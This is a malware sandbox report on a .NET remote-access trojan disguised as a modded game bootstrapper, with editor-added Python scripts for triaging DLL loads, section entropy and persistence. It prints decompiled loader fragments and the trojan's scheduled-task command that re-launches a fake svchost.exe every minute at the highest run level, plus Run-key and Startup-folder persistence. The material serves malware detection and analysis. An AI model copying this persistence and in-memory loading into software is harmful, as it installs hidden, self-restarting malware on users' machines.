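The image-load rows in this report are the raw material for two quick triage checks, and the Python below (an added example by the editor, not part of the Joe Sandbox report or of any Joe Sandbox tooling) runs them over rows in exactly this format. It accepts both shapes the page extraction produced: the fused `<path>.exeSection loaded: <dll>Jump to behavior` form and the cleaned `<path>.exe | Section loaded: <dll>` form. The first check flags a protected image name such as svchost.exe running from a path outside System32 or SysWOW64, which is the behaviour behind the report's "Files With System Process Name In Unsuspected Locations" Sigma hit. The second turns notable DLL loads by non-system-path processes into capability hints: avicap32.dll and msvfw32.dll in not rat.exe are the Video for Windows capture API, and mscoree.dll in the dropped C:\Users\user\AppData\Roaming\svchost.exe means a managed (.NET) image, a load the report's System32\svchost.exe rows do not show. A third helper lists the script hosts that loaded amsi.dll, since the Base64-encoded MpPreference and execution-policy-bypass commands in this report reach AMSI through those PowerShell instances. The sample rows are constructed from entries on this page; SYSTEM_DIRS, SYSTEM_BINARY_NAMES and the DLL_CAPABILITY table are the editor's assumptions, not Joe Sandbox data.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample rows, copied from entries on this page. Both shapes the
# page extraction produced are included: the fused "exeSection loaded: x.dllJump
# to behavior" form and the cleaned "exe | Section loaded: x.dll" form.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
""".strip().splitlines()

# Assumption (editor's choice): anything outside these directories is "not a system location".
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Assumption (editor's choice): image names that should only ever run from SYSTEM_DIRS.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}

# Assumption (editor's choice): what a load of each DLL implies about the loading process.
DLL_CAPABILITY = {
    "mscoree.dll": "managed (.NET) image, CLR loaded",
    "avicap32.dll": "Video for Windows capture API (webcam)",
    "msvfw32.dll": "Video for Windows codecs",
    "winmm.dll": "multimedia API (audio capture/playback)",
    "schannel.dll": "TLS via SChannel",
    "taskschd.dll": "Task Scheduler COM interface",
}

# Tolerates the missing column separator and the "Jump to behavior" link residue.
LINE_RE = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)\s*\|?\s*Section loaded:\s*"
    r"(?P<dll>[^\s|]+?)\s*(?:Jump to behavior)?\s*$"
)


def parse(lines):
    """Return (process_path, dll) pairs in report order; rows that are not load events are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append((m.group("src"), m.group("dll").lower()))
    return events


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def flag_masquerading(events):
    """Processes whose image name is a protected system name but whose path is not a system directory."""
    hits = {src for src, _ in events
            if PureWindowsPath(src).name.lower() in SYSTEM_BINARY_NAMES
            and not in_system_dir(src)}
    return sorted(hits)


def flag_capabilities(events):
    """Capability hints for non-system-path processes, keyed by process, in load order, de-duplicated."""
    out = defaultdict(list)
    for src, dll in events:
        cap = DLL_CAPABILITY.get(dll)
        if cap and not in_system_dir(src) and (dll, cap) not in out[src]:
            out[src].append((dll, cap))
    return dict(out)


def amsi_hosts(events):
    """Processes that loaded amsi.dll, i.e. script hosts whose content is submitted to AMSI."""
    return sorted({src for src, dll in events if dll == "amsi.dll"})


def loads_by_process(events):
    """Ordered, de-duplicated DLL list per process (a compact view of the rows above)."""
    out = defaultdict(list)
    for src, dll in events:
        if dll not in out[src]:
            out[src].append(dll)
    return dict(out)


EVENTS = parse(SAMPLE_LINES)

if __name__ == "__main__":
    for proc in flag_masquerading(EVENTS):
        print(f"[masquerade] system image name outside a system directory: {proc}")
    for proc, caps in flag_capabilities(EVENTS).items():
        for dll, cap in caps:
            print(f"[capability] {proc}: {dll} -> {cap}")
    for proc in amsi_hosts(EVENTS):
        print(f"[amsi] script host with AMSI loaded: {proc}")
```

Run it directly to print the findings for the constructed rows, or import it and feed `parse()` the rows pulled from a report; `loads_by_process()` gives the per-process view that makes the dropped svchost.exe's CLR load stand out against the genuine service host.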
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                          (the same module-load sequence, minus apphelp.dll, is recorded again for each of the three further svchost.exe instances started by the scheduled task)
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                          Source: svchost.lnk.2.drLNK file: ..\..\..\..\..\svchost.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: sDKRz09zM7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: sDKRz09zM7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.PDB source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42B8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.ni.pdbRSDSC source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBD0C000.00000004.00000800.00020000.00000000.sdmp, WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Data.pdbH source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: b77a5c561934e089stem.pdb source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1712971481.0000022EE42C5000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Runtime.Serialization.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Numerics.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdbP source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER61AC.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER61AC.tmp.dmp.12.dr

                          Data Obfuscation

                          Source: not rat.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: not rat.exe.0.dr, Messages.cs.Net Code: Memory
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Messages.cs.Net Code: Memory
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Messages.cs.Net Code: Memory
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                          Source: svchost.exe.2.dr, Messages.cs.Net Code: Memory
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F7C2D push E95DCFC9h; ret 2_2_00007FFB4B0F7C79
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F7C7B push E95DCFC9h; ret 2_2_00007FFB4B0F7C79
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F72BC pushad ; ret 2_2_00007FFB4B0F72CA
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F8604 push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F8648 push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F0699 push edi; ret 2_2_00007FFB4B0F069A
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F867D push eax; ret 2_2_00007FFB4B0F867B
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F29D0 push ebp; retf 3_2_00007FFB4B0FD748
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E412D push ss; ret 3_2_00007FFB4B0FE037
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0FEAA9 push edi; ret 3_2_00007FFB4B0FEAAA
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F8B12 push esi; ret 3_2_00007FFB4B0F8B13
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E00BD pushad ; iretd 3_2_00007FFB4B0E00C1
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E077C pushad ; ret 3_2_00007FFB4B0E078A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AFAD2A5 pushad ; iretd 5_2_00007FFB4AFAD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4AFADFE6 push edi; ret 5_2_00007FFB4AFADFE7
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C1075 pushad ; ret 5_2_00007FFB4B0C108A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C05B9 push edi; ret 5_2_00007FFB4B0C05BA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C0962 push E85DD35Dh; ret 5_2_00007FFB4B0C09F9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B192316 push 8B485F95h; iretd 5_2_00007FFB4B19231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B191519 push eax; retf 5_2_00007FFB4B191539
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AFBDF06 push edi; ret 8_2_00007FFB4AFBDF07
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4AFBD2A5 pushad ; iretd 8_2_00007FFB4AFBD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0D0E95 pushad ; ret 8_2_00007FFB4B0D0EAA
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0D0570 push eax; retf 8_2_00007FFB4B0D05FD
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B1A2316 push 8B485F94h; iretd 8_2_00007FFB4B1A231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4AFDDB66 push edi; ret 17_2_00007FFB4AFDDB67
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4AFDD2A5 pushad ; iretd 17_2_00007FFB4AFDD2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B0F119D pushad ; ret 17_2_00007FFB4B0F11F2
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B0F0519 push edi; ret 17_2_00007FFB4B0F051A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B1C2316 push 8B485F92h; iretd 17_2_00007FFB4B1C231B
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFB4AFED2A5 pushad ; iretd 19_2_00007FFB4AFED2A6
                          Source: sDKRz09zM7.exeStatic PE information: section name: .text entropy: 7.998173784136308
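The entropy reading just above (7.998 bits per byte for .text, where 8.0 is the ceiling for uniformly random data) and the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR static-PE line earlier in the report are both cheap to reproduce on any sample. The Python below is an added example written for this page, not Joe Sandbox code: it walks the PE section table with the standard library only, scores each section's Shannon entropy against an assumed 7.2 triage threshold (the threshold is an assumption, not a Joe Sandbox constant), and checks whether the CLR data directory is populated, i.e. whether the image is a .NET assembly. The PE it analyses is constructed inline (headers plus three synthetic sections, not executable) so the example runs offline; replace SAMPLE_PE with the bytes of a real file to use it for triage.

```python
import math
import random
import struct
from collections import Counter

# Constructed example (not from the report): parse a PE section table and score
# each section's Shannon entropy, the check behind ".text entropy: 7.998".

PACKED_THRESHOLD = 7.2  # assumption: a common triage cut-off, not a Joe Sandbox value


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def _optional_header(pe: bytes):
    """Return (coff_offset, optional_header_offset, optional_header_size)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    return coff, coff + 20, size_opt


def has_clr_header(pe: bytes) -> bool:
    """True when data directory 14 (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR) is populated."""
    _, opt, _ = _optional_header(pe)
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_base = opt + (112 if magic == 0x20B else 96)  # PE32+ vs PE32 data-directory offset
    rva, size = struct.unpack_from("<II", pe, dd_base + 14 * 8)
    return rva != 0 and size != 0


def section_entropies(pe: bytes):
    """Yield (section_name, entropy, raw_size) for every header in the section table."""
    coff, opt, size_opt = _optional_header(pe)
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    table = opt + size_opt
    for i in range(num_sections):
        hdr = table + 40 * i  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        raw = pe[ptr_raw:ptr_raw + size_raw]
        yield name, shannon_entropy(raw), len(raw)


def triage(pe: bytes, threshold: float = PACKED_THRESHOLD) -> dict:
    """Map section name -> (entropy rounded to 3 places, flagged as packed/encrypted)."""
    return {name: (round(ent, 3), ent >= threshold) for name, ent, _ in section_entropies(pe)}


def build_test_pe(sections, dotnet: bool = True) -> bytes:
    """Construct a minimal PE32+ image: DOS header, COFF header, zeroed optional header, section table, raw data."""
    e_lfanew, opt_size, n = 0x40, 0xF0, len(sections)
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, n, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)  # PE32+ magic
    if dotnet:
        struct.pack_into("<II", opt, 112 + 14 * 8, 0x2008, 0x48)  # synthetic CLR header entry
    ptr = e_lfanew + 4 + 20 + opt_size + 40 * n  # raw data starts right after the section table
    table, body = b"", b""
    for idx, (name, raw) in enumerate(sections):
        table += name.encode().ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(raw), 0x1000 * (idx + 1), len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    return dos + b"PE\0\0" + coff + bytes(opt) + table + body


# Constructed sections: pseudo-random .text (what an encrypted payload looks like),
# a repetitive .rsrc and an all-zero .reloc.
_rng = random.Random(1)
SAMPLE_PE = build_test_pe([
    (".text", bytes(_rng.getrandbits(8) for _ in range(65536))),
    (".rsrc", b"This program cannot be run in DOS mode.\r\n" * 256),
    (".reloc", b"\0" * 512),
])

if __name__ == "__main__":
    print("CLR header present:", has_clr_header(SAMPLE_PE))
    for name, (ent, packed) in triage(SAMPLE_PE).items():
        print(f"{name:<8} entropy={ent:.3f} packed={packed}")
```

A .text section scoring close to 8.0 in a .NET image means the managed code is stored compressed or encrypted and rebuilt at runtime, which is consistent with the AppDomain.Load(byte[]) calls listed above: static decompilation shows the loader, not the payload, and the memory-dumped .unpack artifacts referenced elsewhere in this report are the ones worth decompiling.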

                          Persistence and Installation Behavior

                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\svchost.exe
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile created: C:\Users\user\AppData\Roaming\not rat.exe

                          Boot Survival

                          Source: Yara matchFile source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                          Source: C:\Users\user\AppData\Roaming\not rat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost
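Three persistence mechanisms are recorded above for the same dropped payload: a scheduled task named svchost that re-launches C:\Users\user\AppData\Roaming\svchost.exe every minute with /RL HIGHEST, a Startup-folder svchost.lnk whose relative target ..\..\..\..\..\svchost.exe climbs back up to the Roaming directory, and an HKCU Run value named svchost. The Python below is an added example for this page, not part of the Joe Sandbox report or of the malware: it parses the recorded schtasks command line, flags a system-process file name sitting outside C:\Windows and in a user-writable path, and resolves the .lnk relative target against the Startup folder. The SYSTEM_PROCESS_NAMES list, the user-writable path heuristic, the schedule threshold and the benign comparison command line are assumptions made for illustration.

```python
import ntpath
import re

# Constructed example (not from the report): triage of schtasks / Startup-folder
# persistence artifacts. Lists and thresholds are assumptions.

SYSTEM_PROCESS_NAMES = {  # names that should not exist outside the Windows directory
    "svchost.exe", "csrss.exe", "lsass.exe", "smss.exe", "wininit.exe",
    "winlogon.exe", "services.exe", "conhost.exe", "dllhost.exe", "explorer.exe",
}
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

# The schtasks command line as recorded in the report, and a constructed benign one.
SAMPLE_TASK_CMD = (r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                   r'/tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"')
BENIGN_TASK_CMD = r'schtasks.exe /create /tn "NightlyBackup" /tr "C:\Program Files\Tool\backup.exe" /sc daily /st 02:00'


def parse_schtasks(cmdline: str) -> dict:
    """Map each /switch (lower-cased) to its value, or None for bare switches such as /create and /f."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    opts, i = {}, 1  # index 0 is the executable itself
    while i < len(toks):
        if toks[i].startswith("/"):
            key = toks[i][1:].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[key] = toks[i + 1]
                i += 2
                continue
            opts[key] = None
        i += 1
    return opts


def masquerades_system_name(path: str) -> bool:
    """A system-process file name whose location is not under C:\\Windows."""
    return (ntpath.basename(path).lower() in SYSTEM_PROCESS_NAMES
            and not path.lower().startswith("c:\\windows\\"))


def in_user_writable_path(path: str) -> bool:
    """Heuristic: profile AppData, Users\\Public or ProgramData (assumption, not exhaustive)."""
    p = path.lower()
    return "\\appdata\\" in p or "\\users\\public\\" in p or p.startswith("c:\\programdata\\")


def assess_schtasks(cmdline: str) -> list:
    """Return findings for a schtasks /create command line; an empty list means nothing notable."""
    o = parse_schtasks(cmdline)
    if "create" not in o:
        return []
    target = o.get("tr") or ""
    findings = []
    if masquerades_system_name(target):
        findings.append("system-process name outside the Windows directory")
    if in_user_writable_path(target):
        findings.append("task action lives in a user-writable path")
    if (o.get("sc") or "").lower() == "minute" and int(o.get("mo") or 1) <= 5:
        findings.append(f"re-launched every {o.get('mo') or 1} minute(s)")
    if (o.get("rl") or "").upper() == "HIGHEST":
        findings.append("requests the highest available run level")
    if "f" in o:
        findings.append("/f silently replaces any existing task with this name")
    return findings


def resolve_startup_lnk(relative_target: str, startup_dir: str = STARTUP_DIR) -> str:
    """Resolve a .lnk target given relative to the Startup folder, e.g. the report's ..\\..\\..\\..\\..\\svchost.exe."""
    return ntpath.normpath(ntpath.join(startup_dir, relative_target))


if __name__ == "__main__":
    for finding in assess_schtasks(SAMPLE_TASK_CMD):
        print("-", finding)
    print("lnk target ->", resolve_startup_lnk(r"..\..\..\..\..\svchost.exe"))
```

Two caveats when acting on these findings. /RL HIGHEST only yields an elevated token if the account creating the task is an administrator; for a standard user the task still runs at that user's level, so the flag indicates intent rather than achieved privilege. And because the task fires every minute, terminating svchost.exe is not remediation: the task, the Run value and the Startup .lnk all have to be removed, and the file itself deleted, or the payload returns within sixty seconds.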

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences across the powershell.exe instances)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences across the powershell.exe instances)
                          Note: opening a module manifest (.psd1) under the system Modules directory is consistent with PowerShell's module discovery when it resolves commands, not by itself with use of BitLocker cmdlets; weigh this signature lightly unless a BitLocker command appears in the recorded command lines.
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess information set: NOOPENFILEERRORBOX (19 occurrences)
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: NOOPENFILEERRORBOX (42 occurrences)
                          Note: SetErrorMode(SEM_NOOPENFILEERRORBOX) only suppresses the message box shown when a file cannot be found; it is set by many benign applications and runtimes and carries little weight on its own.
